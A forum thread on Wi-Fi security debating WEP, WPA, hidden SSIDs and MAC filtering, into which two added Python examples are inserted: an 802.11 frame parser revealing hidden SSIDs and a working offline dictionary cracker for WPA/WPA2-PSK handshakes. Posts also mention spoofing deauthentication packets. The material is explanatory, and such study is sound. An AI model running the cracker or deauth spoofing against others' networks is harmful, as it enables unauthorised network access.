
Wi-Fi penetration made pant-soilingly easy


patrickl:

--- Quote from: ChadTower link=topic=62998.msg627493#msg627493 --- Patrick, while you're right about a lot of that, what it doesn't address is that most of the most common places to sit and scan for openings are free wifi spots.  Starbucks, restaurants, hell the local McDonald's has wifi now.  Who that works at McDonald's is going to manage security and explain it to your average McDonald's customer when they bring in their ancient laptop and can't get on the net?  The only logistic way to handle that without hiring an expensive admin/support person is to keep it wide open.  That makes it the perfect place for someone with bad intentions... guaranteed wide open access point and anyone there is probably also wide open.

--- End quote ---
Entirely true. I was just reacting to your claim that even if you protect your access point, the network is still wide open. Apart from idiots bringing in new open access points (ad hoc or infrastructure), of course.

Indeed, people using an open WiFi hotspot had better make sure they have some other form of protection if they want to keep their information private (firewall/VPN/virus scanner/etc.). Or just hope that no one is listening/hacking.

Indeed, if their computer gets hacked then anything can happen when they come back into your secure environment. But then a computer can also get hacked from using a malicious website (WLAN or cabled), so you need to protect every computer going online anyway.

It's illegal to break in, BTW (even on an open connection). Last year a guy in the US was arrested for using his neighbour's internet connection. But still, that doesn't mean you should leave your door open.

You shouldn't really use WiFi with anything less than WPA encryption. WEP can be hacked in minutes (if there is enough traffic), and an open connection is like an open door, so anyone can come in. Setting up WPA is hardly more difficult than using WEP and only slightly more work than leaving it all open.

The following steps will easily protect a WLAN:
- Put a password on the Access Point (on the administration interface)
- Change the name (SSID) of your network in the access point and make sure it's not broadcast
- Use WPA encryption (or at the very least WEP if you must use some old devices that can't use WPA, but do realize WEP can be hacked)

Disabling SSID broadcast (your network will stop screaming out its name to the whole world) is a nuisance, but I think it's a big step. It prevents your network from showing up in a WLAN scan. So you have to type in the name yourself rather than have Windows autodetect it (which obviously makes it a bit more work to set up, but hardly a lot). Active scanning software only sees the broadcast SSIDs, so that's the biggest percentage of hackers that are gone with one simple step.

The WPA encryption deals with the passive scanners.

Personally I don't bother with a MAC-address filter. It can be hacked anyway and it's a huge nuisance, but of course if you feel like it use that too.

Strokemouth:
You're half right on the WPA stuff. WPA-PSK (TKIP) is just as easy to crack as WEP as it uses the same RC4 encryption. In fact, WPA-PSK (TKIP) is easier to crack as you only need to gather one small set of data from one person joining the network. The advent of WPA2 makes it a little tougher now since you can choose to use AES over RC4, but you are still only limited by how complex the password is. Since WPA can use a simple passphrase, chances are they are pretty easy to brute force. WPA Enterprise is a different story, but I doubt you'll see many places in your neighborhood that have their wireless hooked up to a RADIUS server using WPA w/ 802.1x, etc.

Even disabling SSID broadcast doesn't REALLY protect you. It is VERY easy to get the SSID of an AP that is not set to broadcast. You can use something like AirJack to spoof a deauthenticate packet to the client, forcing them to re-establish a session and causing the SSID to be sent plain text again or just use one of the many sniffers that look in places other than the beacon packet for the SSID (which, again, is sent plain text).

The best way to stay secure wirelessly is to use a layered approach. Turning off broadcast is a start. Use WPA2 (AES). MAC filtering does help, too. The logic is not that one of these measures will prevent all attacks, but that there will be enough hurdles in the way to make a possible attacker double-think whether or not it is worth their time.
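Added example, not part of either poster's text: a small parser over constructed 802.11 management frames showing the point made above about hidden SSIDs. A "hidden" AP only blanks the SSID element in its beacons; the probe response it sends to a client that already knows the name, and the association request a client sends when it (re)joins, e.g. after a spoofed deauthentication, still carry the SSID in clear text. Frame layout follows the 802.11 management frame format; the MAC address, network name "HomeNet" and the frames themselves are constructed for the demo, not captured traffic.

```python
"""Added example, not from the thread: where the SSID shows up in 802.11
management frames. A 'hidden' AP sends beacons with an empty SSID element,
but probe responses and (re)association requests still carry the name in
clear text, so a sniffer that watches more than beacons recovers it.
All frames below are constructed for this demo, not captured traffic."""

# Frame Control byte 0 for management frames: subtype << 4 | type (0) | version (0)
BEACON, PROBE_RESP, ASSOC_REQ = 0x80, 0x50, 0x00
SUBTYPE_NAME = {BEACON: "beacon", PROBE_RESP: "probe_resp", ASSOC_REQ: "assoc_req"}
# Fixed (non-IE) fields that follow the 24-byte MAC header:
#   beacon / probe response: timestamp(8) + beacon interval(2) + capability(2)
#   association request:     capability(2) + listen interval(2)
FIXED_LEN = {BEACON: 12, PROBE_RESP: 12, ASSOC_REQ: 4}
SSID_ELEMENT_ID = 0
AP_MAC = bytes.fromhex("001122aabbcc")   # constructed for the demo


def build_mgmt_frame(subtype, ssid, hidden=False):
    """Build a minimal management frame: MAC header, fixed fields, then the
    SSID information element (ID 0, length, value) followed by a DS Parameter
    Set element (ID 3) so the parser has to walk a list, not a single element."""
    header = (bytes([subtype, 0x00]) + b"\x00\x00"      # frame control, duration
              + b"\xff" * 6 + AP_MAC + AP_MAC          # addr1 (broadcast), addr2, addr3
              + b"\x00\x00")                           # sequence control
    fixed = b"\x00" * FIXED_LEN[subtype]
    ssid_bytes = b"" if hidden else ssid.encode()
    ssid_ie = bytes([SSID_ELEMENT_ID, len(ssid_bytes)]) + ssid_bytes
    ds_ie = bytes([3, 1, 6])                            # DS Parameter Set: channel 6
    return header + fixed + ssid_ie + ds_ie


def parse_ssid(frame):
    """Walk the information elements and return the SSID, or None when the
    frame carries a hidden SSID (zero length or zero-filled) or none at all."""
    subtype = frame[0]
    body = frame[24 + FIXED_LEN[subtype]:]
    i = 0
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if eid == SSID_ELEMENT_ID:
            if length == 0 or value == b"\x00" * length:
                return None          # hidden: AP blanked the element
            return value.decode("utf-8", "replace")
        i += 2 + length
    return None


def discover_ssids(frames):
    """What a sniffer learns from a set of frames, keyed by frame kind."""
    return {SUBTYPE_NAME[f[0]]: parse_ssid(f) for f in frames}


# Constructed "capture": the hidden-SSID beacon, the probe response the AP sends
# to a client that already knows the name, and the association request a client
# sends when it (re)joins, e.g. right after being deauthenticated.
CAPTURE = [
    build_mgmt_frame(BEACON, "HomeNet", hidden=True),
    build_mgmt_frame(PROBE_RESP, "HomeNet"),
    build_mgmt_frame(ASSOC_REQ, "HomeNet"),
]

if __name__ == "__main__":
    for kind, ssid in discover_ssids(CAPTURE).items():
        print(f"{kind:11s} -> {ssid!r}")
```

Only the beacon comes back with no name; the other two frames give it up in the clear, which is all a sniffer that looks beyond beacons needs.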

ChadTower:

Or, turn it off when you're not actually using it.   :)

patrickl:

--- Quote from: Strokemouth on February 11, 2007, 08:50:19 pm ---You're half right on the WPA stuff. WPA-PSK (TKIP) is just as easy to crack as WEP as it uses the same RC4 encryption.

--- End quote ---
Well, the thing is that with WPA (using TKIP) the key changes, so the hacker doesn't get the chance to collect enough data to actually crack the encryption. Of course, the newer the version of WPA you use, the better, but even the basic form of WPA is a lot harder to hack than WEP. The only way to do it (in a WPA-PSK network) is with a dictionary or brute force attack, and that can take a very long time. Depending on your password it will take days to centuries before it gets hacked.

It's substantially harder (more time consuming) to crack even the simplest form of WPA than it is to crack WEP. Of course you should select a secure password, but that goes for every password you use.


--- Quote ---The best way to stay secure wirelessly is to use a layered approach.
--- End quote ---
Maybe you missed that, but that's what I said too. I didn't suggest either of the steps as a separate method of securing the network.

:edit: Forgot to ask, but what reason do you have for using MAC-address filtering? Just as an extra layer? I always thought that a hacker, who is already able to sniff and decrypt WPA, will have no trouble getting the MAC-address out of the frames and spoof it. It's the last hurdle a hacker faces and by then I doubt it will stop him, so that's why I don't bother with it.
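Added example, not part of either poster's text, to make concrete what both Strokemouth and patrickl are describing: the offline dictionary attack on WPA/WPA2-PSK. The key derivation (PBKDF2-HMAC-SHA1 with the SSID as salt, the 802.11i PRF-512 for the PTK, and the EAPOL-Key MIC keyed by the KCK) is as specified in IEEE 802.11i; everything else (the MAC addresses, nonces, EAPOL frame, network name "HomeNet", passphrase and wordlist) is constructed for the demo. The function names are mine.

```python
"""Added example, not from the thread: why a WPA/WPA2-PSK network is only as
strong as its passphrase. From one captured 4-way handshake (both MACs,
ANonce, SNonce, and one EAPOL-Key frame with its MIC) an attacker can test
candidate passphrases offline; no further traffic from the victim is needed.
Key derivation follows IEEE 802.11i; the handshake values are constructed."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt, so a hidden SSID is no obstacle to this attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed, aes=True):
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed. KCK is
    PTK[0:16]; HMAC-SHA1 for CCMP (descriptor version 2), HMAC-MD5 for TKIP
    (version 1); the MIC is the first 16 bytes either way."""
    digest = hashlib.sha1 if aes else hashlib.md5
    return hmac.new(kck, eapol_frame_mic_zeroed, digest).digest()[:16]


def crack_psk(capture, wordlist):
    """Offline dictionary attack: recompute PMK -> PTK -> KCK -> MIC for each
    candidate and compare with the captured MIC. Returns the passphrase or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])
        mic = eapol_mic(ptk[:16], capture["eapol"], capture["aes"])
        if hmac.compare_digest(mic, capture["mic"]):
            return candidate
    return None


def build_capture(passphrase, ssid, aes=True):
    """Stand-in for a sniffed handshake: message 2 of the 4-way handshake
    (client -> AP) with a MIC computed from the real passphrase. All values
    are constructed for the demo."""
    ap_mac = bytes.fromhex("001122aabbcc")
    sta_mac = bytes.fromhex("00deadbeef01")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    # EAPOL-Key frame with the MIC field zeroed: EAPOL header (v1, type 3,
    # length 0x5f), descriptor type 2 (RSN), key info 0x010a (pairwise, MIC set,
    # descriptor version 2), key length 16, replay counter, SNonce, IV, RSC, ID,
    # zeroed MIC, key data length 0.
    eapol = (b"\x01\x03\x00\x5f" + b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8
             + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol, aes),
            "aes": aes}


if __name__ == "__main__":
    capture = build_capture("dragon123", "HomeNet")
    print(crack_psk(capture, ["letmein", "password", "dragon123", "correct horse"]))
```

Two things the code makes visible that the thread argues about: the TKIP/AES choice only changes which HMAC computes the MIC, not the attack, and each candidate costs 4096 PBKDF2 iterations, which is why a PSK crack is a per-guess slog compared with WEP and why the passphrase's length and entropy decide whether "days to centuries" is days or centuries.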

ChadTower:

A lot of the "hackers" I've talked to were just script kiddies that didn't understand what the crap they downloaded was doing... so any potential hurdle could be an entry killer, one more is just that much better.
